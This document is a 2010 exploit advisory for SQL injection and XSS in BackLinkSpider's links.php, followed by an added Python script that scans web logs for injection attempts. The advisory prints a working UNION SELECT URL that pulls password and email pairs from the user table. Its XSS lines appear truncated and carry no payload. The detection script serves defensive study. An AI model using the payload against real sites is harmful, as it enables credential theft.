# Exploit Title: [ BackLinkSpider - (links.php) - [ SQL & XSS ] Injection Vulnerability ]
# Date: [ 2010-05-27 ]
# Author: [ sniper ip ]
# Software Link: [ http://www.backlinkspider.com ]
# Version: [ v 1.3.1774.0 ]
# Tested on: [ ]
# CVE : [if exists]

Exploit :

[ SQL ]

http://site.com/links.php?cat_id=-1+UNION+SELECT+1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20+from+lp_user_tb--

----------------------------------------------

[ XSS ]

http://site.com/links.php?cat_id=
http://site.com/links.php?siteid=
http://site.com/links.php?cat_id=1&cat_name=1
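Added example (not part of the original advisory, and not BackLinkSpider code): a log check that flags requests to links.php whose cat_id, siteid or cat_name values do not look like normal input. It assumes cat_id and siteid are numeric ids and that requests are logged in combined log format; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption (not stated in the advisory): cat_id and siteid are numeric ids,
# cat_name is display text, and requests are logged in combined log format.
NUMERIC_PARAMS = {"cat_id", "siteid"}
TEXT_PARAMS = {"cat_name"}
SQL_TOKENS = re.compile(r"\b(union|select|concat|from)\b|--|/\*", re.I)
MARKUP = re.compile(r"[<>\"']")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/May/2010:10:00:01 +0000] "GET /links.php?cat_id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/May/2010:10:00:02 +0000] "GET /links.php?cat_id=-1+UNION+SELECT+1,2,3-- HTTP/1.1" 200 913',
    '198.51.100.8 - - [27/May/2010:10:00:03 +0000] "GET /links.php?cat_id=1&cat_name=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 5200',
    '198.51.100.9 - - [27/May/2010:10:00:04 +0000] "GET /links.php?siteid=7%27 HTTP/1.1" 500 312',
    '192.0.2.11 - - [27/May/2010:10:00:05 +0000] "GET /index.php?cat_id=x HTTP/1.1" 200 4100',
]

def check_request(target):
    """Return (param, reason) findings for one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/links.php"):
        return []
    findings = []
    # parse_qsl decodes '+' and %xx, so encoded values are inspected in clear.
    for name, value in parse_qsl(parts.query):
        if name in NUMERIC_PARAMS:
            if SQL_TOKENS.search(value):
                findings.append((name, "sql-keywords"))
            elif not re.fullmatch(r"\d+", value):
                findings.append((name, "non-numeric"))
        elif name in TEXT_PARAMS and MARKUP.search(value):
            findings.append((name, "markup"))
    return findings

def scan(log_lines):
    """Return (client_ip, findings) for every flagged log line."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        found = check_request(match.group(1)) if match else []
        if found:
            hits.append((line.split()[0], found))
    return hits

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG):
        print(ip, found)
```

The same allow-list (digits only for the id parameters, no markup characters in cat_name) is what the application should enforce server-side before the values reach a query or the page output.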